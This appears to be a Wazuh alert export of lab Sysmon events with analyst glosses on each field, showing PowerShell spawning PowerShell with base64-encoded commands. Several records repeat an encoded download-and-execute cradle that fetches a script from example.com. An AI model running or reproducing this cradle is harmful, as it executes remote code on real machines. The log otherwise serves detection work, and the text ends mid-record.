data.win.eventdata.processGuid: {94294ddc-bd33-680a-510b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14452 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_11mj13ze.ayt.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:40.661 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 57 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534266.1466493 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:43.8586741Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284053 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:42.441
ProcessGuid: {94294ddc-bd36-680a-530b-000000000e00}
ProcessId: 14008
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd33-680a-510b-000000000e00}
ParentProcessId: 14452
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:42.441 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd36-680a-530b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14008 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd33-680a-510b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 14452 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 61 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534266.1474564 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:44.1199096Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284054 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:44.080
ProcessGuid: {94294ddc-bd36-680a-530b-000000000e00}
ProcessId: 14008
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_rm1lhycc.bo2.ps1
CreationUtcTime: 2025-04-24 22:37:44.080
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:44.080 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd36-680a-530b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14008 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_rm1lhycc.bo2.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:44.080 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 58 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534269.1477333 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:46.7468088Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284082 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:45.366
ProcessGuid: {94294ddc-bd39-680a-550b-000000000e00}
ProcessId: 11904
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd36-680a-530b-000000000e00}
ParentProcessId: 14008
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:45.366 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd39-680a-550b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11904 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd36-680a-530b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 14008 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 62 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534269.1485404 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:47.0408204Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284083 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:46.996
ProcessGuid: {94294ddc-bd39-680a-550b-000000000e00}
ProcessId: 11904
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_bkyc1qor.00t.ps1
CreationUtcTime: 2025-04-24 22:37:46.996
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:46.996 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd39-680a-550b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11904 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_bkyc1qor.00t.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:46.996 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 59 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534272.1488173 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:50.1585075Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284107 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:48.495
ProcessGuid: {94294ddc-bd3c-680a-570b-000000000e00}
ProcessId: 10384
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
